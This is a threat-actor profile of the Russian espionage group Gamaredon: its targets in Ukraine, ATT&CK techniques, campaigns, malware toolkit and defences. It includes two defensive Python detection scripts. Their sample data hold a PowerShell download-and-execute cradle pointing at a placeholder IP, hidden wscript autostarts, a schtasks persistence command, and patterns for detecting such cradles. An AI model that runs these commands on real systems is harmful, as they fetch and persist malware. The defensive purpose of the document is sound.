Gamaredon
Gamaredon is the most active and persistent Russian state-sponsored cyber espionage group targeting Ukraine, attributed by the Security Service of Ukraine (SSU) to the 18th Center of Information Security of Russia's Federal Security Service (FSB) operating from occupied Crimea. Active since at least 2013, the group has conducted over 5,000 cyberattacks against Ukrainian government, military, law enforcement, and critical infrastructure, and has been intensifying operations throughout the Russia-Ukraine war with an evolving custom malware toolkit and aggressive spearphishing campaigns.
Overview
Gamaredon is a Russian state-sponsored advanced persistent threat group that has been active since at least 2013, making it one of the longest-running cyber espionage operations focused on Ukraine. The group's name derives from a misspelling of "Armageddon" found in early campaign artifacts. In November 2021, the Security Service of Ukraine (SSU) publicly attributed Gamaredon to the FSB's 18th Center of Information Security, specifically identifying five officers operating from occupied Crimea who were former Ukrainian security officials and defected during the 2014 annexation.
Unlike more technically sophisticated Russian APT groups such as Sandworm or APT29, Gamaredon prioritizes volume and persistence over stealth. ESET observed over 1,000 unique devices in Ukraine targeted by the group in 2022-2023 alone. The group deploys multiple simple downloaders or backdoors simultaneously on compromised systems, accepting the risk of detection in exchange for maintaining persistent access. While this approach appears crude, Gamaredon's relentless pace and continuous innovation in delivery techniques make it a formidable threat.
Gamaredon's primary focus has remained Ukraine throughout its entire operational history. The group targets governmental institutions, military organizations, law enforcement agencies, the judiciary, NGOs, and critical infrastructure, in line with Russian geopolitical intelligence requirements. Since Russia's full-scale invasion in February 2022, Gamaredon has significantly intensified its operations, and ESET observed the group targeting Ukrainian institutions exclusively throughout 2024. Limited targeting of NATO member states (Bulgaria, Latvia, Lithuania, Poland) and of a petroleum refinery in a NATO country was observed in 2022-2023, with no successful breach confirmed outside Ukraine.
In June 2024, two individuals linked to Gamaredon were sanctioned by the Council of the European Union for cyberattacks against the EU. In July 2025, ESET published updated research showing that Gamaredon significantly increased the scale and frequency of its spearphishing campaigns in the second half of 2024, introducing new delivery techniques including HTML smuggling and PowerShell execution from Cloudflare-generated domains. The group also used one attack payload solely to spread Russian propaganda, showing the convergence of cyber espionage and information warfare operations.
Target Profile
Gamaredon almost exclusively targets Ukraine, with Ukrainian governmental institutions as the primary focus. The group's targeting aligns precisely with Russian intelligence requirements related to the ongoing conflict. Limited opportunistic targeting of NATO countries has been observed but with no confirmed successful breaches.
- Ukrainian government institutions: The core target sector since 2013. Includes ministries, state agencies, the State Migration Service, regional administrations, and the System of Electronic Interaction of Executive Bodies (SEI EB), which Gamaredon targeted in a supply chain attack to distribute malware through official document channels.
- Ukrainian military: Military organizations and defense-related entities targeted for operational intelligence. In April 2025, Symantec reported Gamaredon targeting a foreign military mission based in Ukraine, demonstrating interest in allied military operations on Ukrainian soil.
- Law enforcement and judiciary: Ukrainian security services, police, and judicial bodies targeted for intelligence on investigations, counterintelligence operations, and legal proceedings related to the conflict.
- Critical infrastructure: Energy, telecommunications, and other critical infrastructure sectors in Ukraine targeted to support Russian military and intelligence objectives.
- NGOs and civil society: Non-profit and non-governmental organizations operating in Ukraine, particularly those involved in human rights, governance reform, and international affairs.
- NATO member states (limited): In 2022-2023, ESET observed attempted attacks against targets in Bulgaria, Latvia, Lithuania, and Poland. A petroleum refining company in a NATO country was also targeted. No successful breaches were confirmed outside Ukraine.
Tactics, Techniques & Procedures
Gamaredon favors volume and persistence over sophistication. The group deploys multiple redundant backdoors simultaneously, accepts detection risk, and invests heavily in delivery technique innovation and infrastructure rotation rather than advanced post-exploitation tradecraft.
| mitre id | technique | description |
|---|---|---|
| T1566.001 | Phishing: Spearphishing Attachment | Primary initial access vector. Aggressive spearphishing campaigns with malicious archives (RAR, ZIP, 7z), XHTML files with HTML smuggling, and weaponized Office documents. Campaigns typically last 1-5 consecutive days. In H2 2024, ESET observed significantly intensified spearphishing volume. |
| T1221 | Template Injection | Uses remote template injection in DOCX documents to load malicious templates from attacker-controlled servers. Also uses RTF template injection techniques for malware delivery. |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Extensive use of PowerShell for payload execution, download, and C2 communication. PowerPunch is a custom PowerShell beacon for downloading and executing additional malware. In 2024, began executing PowerShell commands directly from Cloudflare-generated domains via malicious LNK files. |
| T1059.005 | Command and Scripting Interpreter: Visual Basic | Heavy reliance on VBScript for malware delivery and execution. PteroLNK and PteroSand are VBScript downloaders. VBA macros in Office documents serve as first-stage infection vectors. Custom VBS scripts provide persistence and lateral movement. |
| T1091 | Replication Through Removable Media | Weaponizes USB drives and accessible file shares to spread malware laterally within organizations. Documents and USB drives accessible to initial victims are modified to propagate malware to additional targets who share files. |
| T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Establishes persistence through registry Run key modifications and scheduled tasks (the latter mapped separately as T1053.005). Deploys multiple concurrent persistence mechanisms so that access survives the removal of any single backdoor. |
| T1071.001 | Application Layer Protocol: Web Protocols | HTTP-based C2 with rotating domains and fast-flux DNS infrastructure. Uses distinctive URL pattern: http(s)://IP/random_alphanumeric_string. Domains registered primarily through REG.RU, recycled and rotated across new infrastructure rather than discarded. |
| T1027 | Obfuscated Files or Information | Heavily obfuscated VBScript payloads. PteroLNK dynamically constructs additional payloads during execution. Uses self-extracting archives (SFX) with 7-Zip to bundle and deliver multiple malware components simultaneously. |
| T1564.001 | Hide Artifacts: Hidden Files and Directories | Alters Windows Explorer settings to hide malicious files. PteroLNK modifies folder options to conceal dropped payloads from user visibility. |
| T1568 | Dynamic Resolution | Relies heavily on dynamic DNS providers, Russian/Ukrainian ccTLDs, and fast-flux infrastructure. Maintains 700+ malicious domains with consistent rotation across IP addresses, making static domain blocking ineffective. |
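The URL shape in the T1071.001 and T1568 rows is simple enough to check mechanically. The following Python is an added example written for this profile, not ESET, Talos or Unit 42 code; the proxy log lines and their space-separated "timestamp client url status" layout are constructed for illustration, and the excluded address ranges and the path-length bounds are assumptions.

```python
"""Flag proxy-log requests with the http(s)://IP/<random_alphanumeric> C2 shape.

Added example for this profile (not ESET/Talos/Unit 42 code). Log format, sample
lines and thresholds are assumptions made for illustration.
"""
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

# Constructed sample in an assumed "timestamp client url status" layout.
# 203.0.113.0/24, 198.51.100.0/24 and 192.0.2.0/24 are documentation ranges used
# here as stand-ins for public C2 addresses.
SAMPLE_PROXY_LOG = """\
2024-11-04T09:12:01Z 10.20.30.41 http://203.0.113.17/Kj8hQ2mVx3 200
2024-11-04T09:12:05Z 10.20.30.41 https://www.example.com/news/index.html 200
2024-11-04T09:15:09Z 10.20.30.52 http://198.51.100.9/a7Bc9 404
2024-11-04T09:16:33Z 10.20.30.41 http://203.0.113.17/update.exe 200
2024-11-04T09:20:00Z 10.20.30.60 http://192.0.2.5:8080/ZxQ1pL9r 200
2024-11-04T09:21:10Z 10.20.30.60 http://10.0.0.7/ 200
"""

# Only RFC 1918 and loopback are excluded, so the documentation ranges above stay in scope.
_INTERNAL = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# One opaque path segment: letters and digits only, no dot (so no file extension), no slash.
_RANDOM_SEGMENT = re.compile(r"^[A-Za-z0-9]{5,40}$")


def is_gamaredon_c2_shape(url: str) -> bool:
    """True for scheme://<bare external IPv4>[:port]/<single alphanumeric segment>."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.query or parts.fragment:
        return False
    try:
        host = ip_address(parts.hostname or "")
    except ValueError:
        return False  # a hostname (dynamic DNS, Cloudflare domain, ...) needs a different rule
    if host.version != 4 or any(host in net for net in _INTERNAL):
        return False
    segments = parts.path.strip("/").split("/")
    return len(segments) == 1 and bool(_RANDOM_SEGMENT.match(segments[0]))


def scan_proxy_log(text: str) -> list[dict]:
    """Return one finding per log line whose URL has the C2 shape."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # skip blank or truncated lines
        ts, client, url, status = fields[:4]
        if is_gamaredon_c2_shape(url):
            findings.append({"ts": ts, "client": client, "url": url, "status": status})
    return findings


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{hit['ts']} {hit['client']} -> {hit['url']} ({hit['status']})")
```

A bare-IP host with one opaque path segment also describes some legitimate traffic (health checks, IP-only internal applications exposed on public addresses, some CDN edges), so treat matches as a triage queue to join with asset inventory and DNS telemetry rather than as a block rule. Hostnames, including the dynamic DNS and Cloudflare-generated domains the table mentions, deliberately do not match here; they need DNS-based rules.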
Known Campaigns
Confirmed or highly attributed operations. Gamaredon operates continuously rather than in discrete campaigns, but key operational phases and notable incidents are documented below.
- Early operations (2013-2017): Gamaredon's initial operational phase targeted Ukrainian government officials, opposition members, and journalists using off-the-shelf remote access tools (UltraVNC, Remote Manipulator System). It coincided with Russia's annexation of Crimea in 2014. CERT-UA published advisories on Pterodo backdoor usage. The group transitioned to custom malware around 2017, signaling improved technical capabilities.
- COVID-19 lures (2020): Exploited the COVID-19 pandemic as lure material in spearphishing campaigns against Ukrainian targets. Used weaponized DOCX files with remote template injection to deliver Pterodo variants. Part of a broader wave of pandemic-themed operations by multiple threat actors globally.
- Full-scale invasion escalation (2022-2023): Massive escalation following Russia's full-scale invasion of Ukraine in February 2022. ESET observed over 1,000 unique devices attacked in Ukraine during this period. Targeted Ukrainian military and government agencies during the 2023 counteroffensive. Attempted (unsuccessfully) to compromise targets in NATO countries including Bulgaria, Latvia, Lithuania, and Poland, and a petroleum refinery in a NATO state. Infrastructure expanded to 700+ malicious domains and 215+ IP addresses.
- SEI EB document-platform attack: Targeted Ukraine's System of Electronic Interaction of Executive Bodies (SEI EB), the official document distribution platform used by government agencies. Attempted to distribute malicious documents containing macro code through the legitimate government document sharing system, effectively weaponizing a trusted internal communication channel.
- H2 2024 spearphishing surge: ESET research (published July 2025) documented a significant escalation in spearphishing volume during H2 2024, exclusively targeting Ukrainian institutions. Introduced new delivery methods including HTML smuggling via XHTML files, PowerShell execution from Cloudflare-generated domains, and the PteroSand VBScript downloader. One attack payload was used solely to spread Russian propaganda, blending espionage with information warfare.
- Foreign military mission (April 2025): Symantec reported Gamaredon (Shuckworm) targeting a foreign military mission based in Ukraine, demonstrating the group's interest in allied military operations and intelligence activities on Ukrainian soil. This represented an expansion from purely Ukrainian government targets to international military entities operating within Ukraine.
Tools & Malware
Gamaredon maintains a diverse custom malware toolkit that undergoes continuous development and iteration. The group's "Ptero" malware family (named for the Pteranodon dinosaur theme) forms the core of its operations.
- Pterodo / Pteranodon: Custom backdoor and Gamaredon's signature malware, under continuous development since at least 2017, when the group moved from off-the-shelf RATs to custom tooling. Provides remote access, command execution, file upload/download, and system reconnaissance. Multiple variants are deployed simultaneously on compromised systems for redundancy. Delivered via phishing documents and self-extracting archives.
- PteroLNK: Highly obfuscated VBScript malware that dynamically constructs and deploys payloads during execution. Features a downloader component (runs every 3 minutes) and an LNK dropper for propagation. Establishes persistence via scheduled tasks and modifies Explorer settings to hide activity.
- PteroSand: VBScript downloader introduced in 2024, delivered via malicious HTA or LNK files embedded in spearphishing archives. Part of Gamaredon's evolved delivery chain using HTML smuggling techniques.
- PowerPunch: Custom PowerShell beacon used to download and execute subsequent malware stages. Serves as initial foothold before Pterodo deployment.
- QuietSieve: Information-stealing malware for data collection and exfiltration from compromised systems. Targets documents, credentials, and system information aligned with espionage objectives.
- ObfuMerry / ObfuBerry: Obfuscated malware variants used in Gamaredon's delivery chains. Part of the group's strategy of deploying multiple different tools simultaneously.
- DilongTrash / DinoTrain / DesertDown: Additional custom malware families in Gamaredon's evolving toolkit. Names reflect the group's dinosaur-themed naming convention.
- Remcos: In March 2025, Cisco Talos reported Gamaredon using LNK files to distribute the Remcos commercial RAT, representing a rare use of commodity malware alongside custom tools.
- UltraVNC: Legitimate open-source VNC software used in early campaigns (2013-2017) for remote access to compromised systems. Largely replaced by custom malware in later operations.
Indicators of Compromise
Gamaredon operates one of the largest known threat actor infrastructures, with 700+ malicious domains and 215+ IP addresses (Cisco Talos, 2022). Domains are recycled and rotated across new hosting rather than discarded, so a static IOC list ages quickly. Static IOC blocking is therefore insufficient on its own; defenders should track infrastructure patterns (registration, hosting, URL structure) and behavioral indicators alongside it. Unit 42 and ESET maintain continuously updated IOC repositories; this profile lists no individual domains or hashes, which should be taken from those feeds at the time of use.
Mitigation & Defense
Ukrainian government, military, and critical infrastructure organizations are at highest risk. NATO member states with Ukraine-related operations should also maintain awareness. Gamaredon's volume-based approach means defenders must focus on phishing resilience and behavioral detection rather than relying solely on IOC blocking.
- Harden email defenses against spearphishing: Deploy advanced email filtering capable of detecting malicious archives (RAR, ZIP, 7z), XHTML files with HTML smuggling, and Office documents with remote template injection. Block HTA file execution from email attachments. Train users to recognize Gamaredon-style lures themed around Ukrainian government operations.
- Disable Office macros and template injection: Block VBA macro execution in documents received from external sources. Disable automatic loading of remote templates in Word. Implement Attack Surface Reduction (ASR) rules for Office applications to prevent macro and template-based initial access.
- Monitor for VBScript and PowerShell abuse: Deploy behavioral detection for obfuscated VBScript execution (PteroLNK, PteroSand patterns). Monitor for PowerShell downloading payloads from dynamic DNS domains or Cloudflare-generated URLs. Alert on scheduled tasks created by VBScript processes.
- Block USB-based propagation: Implement USB device control policies to prevent malware spread via removable media. Monitor for LNK file modifications on USB drives and network shares, a key Gamaredon lateral movement technique.
- Track Gamaredon infrastructure patterns: Monitor for connections to domains registered through REG.RU and under Russian/Ukrainian ccTLDs, and alert on C2 traffic matching the http(s)://IP/random_alphanumeric pattern. Registrar and TLD are weak signals on their own (both host plenty of legitimate domains), so use them to prioritise investigation rather than to block outright. Integrate Unit 42 and ESET IOC feeds for continuously updated domain and IP indicators.
- Detect redundant persistence mechanisms: Gamaredon deploys multiple backdoors simultaneously. Hunt for multiple concurrent persistence mechanisms (registry Run keys, scheduled tasks, startup folder items) pointing to VBScript or PowerShell payloads. Removal of a single backdoor is insufficient; comprehensive remediation is required.
- Segment sensitive networks: Isolate systems handling classified or sensitive Ukrainian government communications from general network segments. Gamaredon's supply chain attack on the SEI EB system demonstrates the risk of compromised document-sharing infrastructure.
- Monitor ESET and CERT-UA advisories: ESET and Ukraine's CERT-UA are the primary sources for current Gamaredon intelligence. Subscribe to their threat feeds and advisories for real-time updates on new malware variants, infrastructure changes, and delivery techniques.
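The persistence-hunting and scheduled-task points in the list above (script-interpreter autostarts, tasks created by VBScript processes, several mechanisms on one host) can be expressed as a small triage script. The Python below is an added example for this profile, not vendor or CERT-UA code; the autostart entries (an Autoruns-style export) and the two Sysmon-style process-creation events are constructed, and their field names, host names, paths and the 203.0.113.17 URL are assumptions.

```python
"""Triage autostart entries and process-creation events for Gamaredon-style persistence.

Added example for this profile (not vendor or CERT-UA code). Records below are
constructed; field names, hosts, paths and URLs are assumptions.
"""
import re
from collections import defaultdict

# Interpreters the group's stages run under: wscript/cscript for PteroLNK/PteroSand-style
# VBScript, powershell for PowerPunch-style downloaders, mshta for HTA droppers.
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell|pwsh)(\.exe)?\b", re.IGNORECASE)
# Payload stored in a user-writable location rather than Program Files or System32.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
# Download cradles and encoded commands typical of a downloader stage.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|MSXML2\.XMLHTTP|\s-e(nc|ncodedcommand)?\s)",
    re.IGNORECASE)
# Silent execution switches: wscript //B (no dialogs) and PowerShell -WindowStyle Hidden.
HIDDEN_WINDOW = re.compile(r"(//B\b|-w(indowstyle)?\s+hidden)", re.IGNORECASE)

# Constructed Autoruns-style export: one record per persistence entry.
SAMPLE_AUTOSTARTS = [
    {"host": "WS-0412", "source": "HKCU Run", "name": "OneDriveUpd",
     "command": r'wscript.exe //B "C:\Users\olena\AppData\Roaming\Microsoft\svchost.vbs"'},
    {"host": "WS-0412", "source": "Scheduled Task", "name": "Windows Update Check",
     "command": r'''powershell.exe -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.17/Kj8hQ2mVx3')"'''},
    {"host": "WS-0412", "source": "Startup Folder", "name": "report.lnk",
     "command": r"mshta.exe C:\Users\olena\AppData\Local\Temp\report.hta"},
    {"host": "WS-0412", "source": "HKLM Run", "name": "SecurityHealth",
     "command": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"host": "WS-0098", "source": "Scheduled Task", "name": "Adobe Acrobat Update Task",
     "command": r'"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"'},
    {"host": "WS-0098", "source": "HKCU Run", "name": "Teams",
     "command": r'"C:\Users\taras\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"'},
]

# Constructed Sysmon-style process-creation events (Event ID 1 fields).
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 3 /tn "OneDriveUpd" /tr "wscript.exe //B C:\Users\olena\AppData\Roaming\Microsoft\svchost.vbs" /f'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'schtasks /query /tn "Adobe Acrobat Update Task"'},
]


def autostart_reasons(entry: dict) -> list[str]:
    """Return why an entry looks like a script-based backdoor; empty list means not flagged."""
    cmd = entry["command"]
    if not SCRIPT_HOST.search(cmd):
        return []  # native-binary autostart; a user-writable path alone is not enough here
    reasons = ["script interpreter as autostart target"]
    if USER_WRITABLE.search(cmd):
        reasons.append("payload in user-writable path")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle or encoded command")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden-window execution")
    return reasons


def redundancy_report(entries: list[dict], min_mechanisms: int = 2) -> dict[str, list[dict]]:
    """Group flagged entries per host and keep hosts with several distinct persistence
    sources, the 'multiple concurrent backdoors' signature described above."""
    by_host: dict[str, list[dict]] = defaultdict(list)
    for entry in entries:
        reasons = autostart_reasons(entry)
        if reasons:
            by_host[entry["host"]].append({**entry, "reasons": reasons})
    return {host: hits for host, hits in by_host.items()
            if len({hit["source"] for hit in hits}) >= min_mechanisms}


def task_registered_by_script_host(event: dict) -> bool:
    """schtasks.exe /create spawned by a script interpreter (task created by a VBScript process)."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    return (image == "schtasks.exe"
            and "/create" in event["CommandLine"].lower()
            and SCRIPT_HOST.fullmatch(parent) is not None)


if __name__ == "__main__":
    for host, hits in redundancy_report(SAMPLE_AUTOSTARTS).items():
        print(f"{host}: {len(hits)} script-based persistence mechanisms")
        for hit in hits:
            print(f"  [{hit['source']}] {hit['name']}: {', '.join(hit['reasons'])}")
    for event in SAMPLE_PROCESS_EVENTS:
        if task_registered_by_script_host(event):
            print(f"task registered by {event['ParentImage']}: {event['CommandLine']}")
```

The report deliberately ignores native-binary autostarts even when they live under AppData (the Teams entry), because that is where most benign false positives come from; the per-host grouping is what turns three individually plausible entries into a clear remediation scope, which matches the point that removing one backdoor is not enough.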
Gamaredon collaborates with other Russian threat actors. ESET has identified collaboration with InvisiMole, a more technically sophisticated espionage group. This suggests a tiered model where Gamaredon provides initial access and broad coverage, while specialized groups conduct targeted high-value operations on selected compromised systems. The group's FSB attribution to the 18th Center of Information Security (Center 18) in Crimea makes it distinct from GRU-attributed Russian APTs like Sandworm (GRU Unit 74455) and APT28 (GRU Unit 26165). As long as the Russia-Ukraine conflict continues, Gamaredon will remain a persistent and evolving threat.
Sources & Further Reading
Attribution and references used to build this profile.
- MITRE ATT&CK — Gamaredon Group G0047
- ESET — Cyberespionage the Gamaredon Way: Toolset Analysis 2022-2023 (2024)
- ESET — Gamaredon in 2024: Spearphishing with an Evolved Toolset (2025)
- Palo Alto Unit 42 — Russia's Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (2022)
- The Hacker News — Ukraine Identifies Russian FSB Officers Hacking As Gamaredon Group (2021)
- The Record — Russia-backed Gamaredon Still Most Engaged Hacker Group in Ukraine (2024)
- Brandefense — Gamaredon Group: A Persistent Russian Espionage Threat (2025)
- GBHackers — Gamaredon's PteroLNK VBScript Malware Infrastructure and TTPs (2025)
- Malpedia — Gamaredon Group Threat Actor Profile
- Cisco Talos — Network Footprints of Gamaredon Group (2022)